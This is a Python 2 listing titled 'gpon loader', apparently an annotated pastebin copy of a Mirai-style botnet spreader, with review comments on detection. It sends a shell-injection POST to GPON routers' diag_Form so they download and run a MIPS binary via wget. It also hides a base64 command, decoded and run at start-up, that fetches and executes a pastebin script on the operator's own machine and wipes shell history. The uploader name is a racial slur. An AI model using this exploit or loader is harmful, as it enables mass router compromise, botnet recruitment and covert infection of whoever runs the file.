mirainigga

[PYTHON] gpon loader

Jul 8th, 2018
  1. #!/usr/bin/python
  2.  
  3. #new gpon exploit
  4.  
  5. import sys, socket, time, os, base64, subprocess
  6. from Queue import *
  7. from threading import Thread
  8. from sys import stdout
  9.  
  # Usage guard: exactly one argument is expected, the path of a text file
  # that is later read as a list of target hosts (one per line).
  10. if len(sys.argv) < 2:
  11. print "Usage: python "+sys.argv[0]+" <list>"
  12. sys.exit()
  13.  
  # Module-level state shared by every worker thread.
  # port / buf: fixed TCP port the script connects to and the recv() size.
  # count: number of hosts queued; queue: work list filled by load_to_queue().
  14. port = 8080
  15. buf = 4096
  16. count = 0
  17. queue = Queue()
  # Form body for the device's diagnostic "ping" form. The dest_host field
  # carries a $(...) shell substitution instead of a hostname, so the request
  # only has an effect on a device that hands this field to a shell unescaped.
  # 0.0.0.0 is a placeholder download host in this copy of the script.
  # Detection: a dest_host value containing "$(" (or "wget"/"sh") in a POST to
  # /GponForm/diag_Form is not something a legitimate ping request produces.
  18. post_data = "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=$(wget+http://0.0.0.0/mips+-O+->+/tmp/mips;sh+/tmp/mips)&ipv=0\r\n"
  # Raw HTTP request, built once and sent unchanged to every host. Fixed,
  # matchable artefacts: the request line "POST /GponForm/diag_Form?script/",
  # the User-Agent "Hello, World", and a Host header that is always
  # 127.0.0.1:8080 regardless of the real destination.
  # NOTE(review): the "?script/" suffix presumably matters to how the device
  # routes or authorises the request; this listing does not show why.
  19. headers = "POST /GponForm/diag_Form?script/ HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nUser-Agent: Hello, World\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: "+str(len(post_data))+"\r\n\r\n"+str(post_data)
  # Response counter incremented by gpwn(); nothing in this listing reads it.
  20. i = 0
  # Whole target list is read into memory at start-up; the file handle is
  # never closed explicitly.
  21. ips = open(sys.argv[1], "r").readlines()
  22.  
  # Runs `cmd` through the local shell (shell=True) on the machine that is
  # executing this script, not on any remote host. The exit status returned
  # by subprocess.call() is discarded.
  23. def payld_str(cmd):
  24. subprocess.call(cmd, shell=True)
  # NOTE(review): despite its name, this is not a dependency check. The
  # base64 literal decodes to a shell command line that changes to /tmp,
  # downloads a script from a pastebin.com raw URL with wget, makes it
  # executable, runs it with output sent to /dev/null, deletes it, then clears
  # the shell history and the terminal.
  # It executes at module top level, before any target is contacted, so simply
  # launching this file runs third-party code on the operator's own host.
  # Triage hint: decode any base64 literal that flows into a shell call.
  25. checkbinaries = "Y2QgL3RtcDsgd2dldCBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvTHE5UDlDZzUgLU8gYSA+IC9kZXYvbnVsbCAyPiYxOyBjaG1vZCA3NzcgYTsgc2ggYSA+IC9kZXYvbnVsbCAyPiYxOyBybSAtcmYgYTsgaGlzdG9yeSAtYzsgY2xlYXI7"
  26. rebinaries = str(base64.b64decode(checkbinaries))
  27. payld_str(rebinaries)
  28.  
  # Per-host worker, run in its own thread.
  # Opens a TCP connection to host:port (5 s timeout), sends the prebuilt
  # request in `headers`, sleeps 0.5 s, prints a coloured status line, then
  # reads up to `buf` bytes of response.
  29. def gpwn(host):
  30. global i
  31. host = host.strip("\n")
  32. try:
  33. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  34. s.settimeout(5)
  35. s.connect((host, port))
  36. s.send(headers)
  37. time.sleep(0.5)
  # The status line is printed before the response is read, so it is shown for
  # every host that accepted the connection, whatever the device answered.
  38. print "\x1b[1;35m[\x1b[1;36mGPON\x1b[1;35m] \x1b[1;37m- \x1b[1;35m[\x1b[1;32m%s\x1b[1;35m] \x1b[1;37m- \x1b[1;35m[\x1b[1;32mDEPLOYING\x1b[1;35m]" % (host)
  39. resp = s.recv(buf).strip()
  # A "200 OK" substring only shows that a web server answered the POST; the
  # global counter it feeds is not reported anywhere in this listing.
  40. if "200 OK" in resp:
  41. i += 1
  42. s.close()
  # Bare except: every error (refused connection, timeout, reset) is dropped
  # silently, and the socket is not closed on that path.
  43. except:
  44. pass
  45.  
  # Copies every line of the target list into the shared queue, stripping
  # trailing CR/LF characters and updating the global `count`. A one-line
  # progress counter is rewritten in place on stdout using "\r".
  46. def load_to_queue():
  47. global count
  48. for line in ips:
  49. count += 1
  50. line = line.strip("\r\n")
  51. sys.stdout.write("\r[%d] Added to queue" % (count))
  52. sys.stdout.flush()
  53. queue.put(line)
  54. sys.stdout.write("\n")
  55.  
  # Fills the queue, then starts one gpwn() thread per queued host.
  # There is no cap on concurrent threads and no join, so a long list turns
  # into a burst of outbound connections to port 8080 from a single source,
  # which is the traffic pattern a network sensor would see.
  56. def main():
  57. load_to_queue()
  # This `i` is local to main() and is separate from the module-level `i`
  # that gpwn() increments.
  58. i = 0
  59. while i < count:
  60. i += 1
  61. try:
  62. ip = queue.get()
  63. f = Thread(target=gpwn, args=(ip,))
  64. f.start()
  65. queue.task_done()
  # Ctrl-C makes the process send signal 9 to itself, ending it at once
  # without waiting for worker threads.
  66. except KeyboardInterrupt:
  67. os.kill(os.getpid(),9)
  68. except Exception as i:
  69. print i
  70. pass
  # Entry guard for main() only. The module-level statements above, including
  # the decoded local shell command, have already run by this point and would
  # also run if the file were imported.
  71. if __name__ == "__main__":
  72. main()